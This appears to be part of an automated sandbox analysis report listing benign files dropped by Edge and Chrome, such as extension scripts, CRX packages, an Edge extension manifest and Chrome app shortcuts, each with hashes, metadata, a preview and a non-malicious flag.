                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\bc9e740b-b6af-4e84-983d-c20975a42be8.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_691629381\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_691629381\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_691629381\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_691629381\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_691629381\ed033bee-9d6c-42f9-a530-5fbd4b36287e.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.983252933560686
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8jdUTYUT4HtidAKZdA19ehwiZUklqehs5y+3:82/mjy
                                                                                                                                                                                                                                                                                                  MD5:74974508ADB532D3B9C8160FAA1347BD
                                                                                                                                                                                                                                                                                                  SHA1:660307EEEBCB412AD27531E1B0BC384EB07603FE
                                                                                                                                                                                                                                                                                                  SHA-256:D03C7EACC51A9095C52678FFE363E02C1AA64044C0C212964F45FB47D22A70CD
                                                                                                                                                                                                                                                                                                  SHA-512:CA4AEDA93786CC3182DC18E60CF4397D2E1EA345C85E4D1653292C83E36387AD080E570A431C5820D91790F3C8F14EB7C60804A1815AB25E1290E88463EE8B14
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.........T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.*...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9972464447760996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8UdUTYUT4HtidAKZdA1weh/iZUkAQkqehh5y+2:8j/k9Qey
                                                                                                                                                                                                                                                                                                  MD5:35593F57C642410C1479690BB5D06030
                                                                                                                                                                                                                                                                                                  SHA1:92232DF8D55F08D9CE148C98CCE2B589D932AFEB
                                                                                                                                                                                                                                                                                                  SHA-256:684647EF6B5315FC1E190A245B1924628DEAE512ED26F92CE462CFF1994E344E
                                                                                                                                                                                                                                                                                                  SHA-512:827AFFFDE2D68D97AA190ECD30272BBD407F59BCE0D3D038075456EB384F1249BD2B800B0E19FB77A929F7550AE93659FA40F945040990F98548D5C97075A40E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....i...T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.*...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.008482332117183
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8x1dUTYUsHtidAKZdA14tseh7sFiZUkmgqeh7sf5y+BX:8xc/Un3y
                                                                                                                                                                                                                                                                                                  MD5:A481720C9BD68822CFD8B70A12EF7398
                                                                                                                                                                                                                                                                                                  SHA1:7367E2DC664B92719C898BBD83BC5EDE07F8A36B
                                                                                                                                                                                                                                                                                                  SHA-256:F014DC684B6729FE1F637856B09E048B4A61EAA62058186A0B1D07C9BB5D676B
                                                                                                                                                                                                                                                                                                  SHA-512:0B421332F7D765B2CCA282DD6112EB90A94550C06C5C84544CC777FF0E6B25B4744383EA2BE429237B9BE4383ED7581174F157C2BA3CE3F6F3F6B5AEA7809635
                                                                                                                                                                                                                                                                                                  Malicious:false
